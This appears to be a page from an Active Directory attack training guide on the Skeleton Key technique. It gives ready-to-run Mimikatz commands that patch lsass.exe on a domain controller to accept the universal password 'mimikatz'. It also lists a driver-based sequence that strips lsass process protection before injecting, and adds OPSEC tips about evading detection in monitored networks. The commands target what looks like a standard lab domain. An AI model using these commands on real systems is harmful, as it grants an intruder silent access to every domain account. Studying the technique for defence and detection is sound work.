8.4 - Skeleton Key

Skeleton Key

Skeleton Key is a Domain Controller (DC) post-exploitation persistence technique where the lsass.exe process is patched in memory to accept a master password for all users.

Key Concepts

  • Discovered by Dell SecureWorks in malware named Skeleton Key.

  • Once injected, any valid username can be used to authenticate with a universal password (usually mimikatz).

  • Does not survive reboots, as it’s a memory patch.

  • Can cause instability and interfere with services like Active Directory Certificate Services (AD CS).

  • Requires Domain Admin privileges.


Usage with Mimikatz (PowerShell Remoting)

To inject the Skeleton Key into lsass.exe on a Domain Controller:

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
  • After injection, login to any machine in the domain using any valid username and the password mimikatz.

Example:

Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\Administrator

OPSEC Warning: Easily detectable due to behavior and logging. Avoid on mature/monitored environments.


If lsass.exe is a Protected Process (PPL)

In some environments, lsass runs with Protected Process Light (PPL). You can still inject Skeleton Key using the Mimikatz driver:

mimikatzCopiaModificamimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

This involves kernel-mode driver loading (mimidriv.sys) and is very noisy—triggers EDR alerts and logging.

Last updated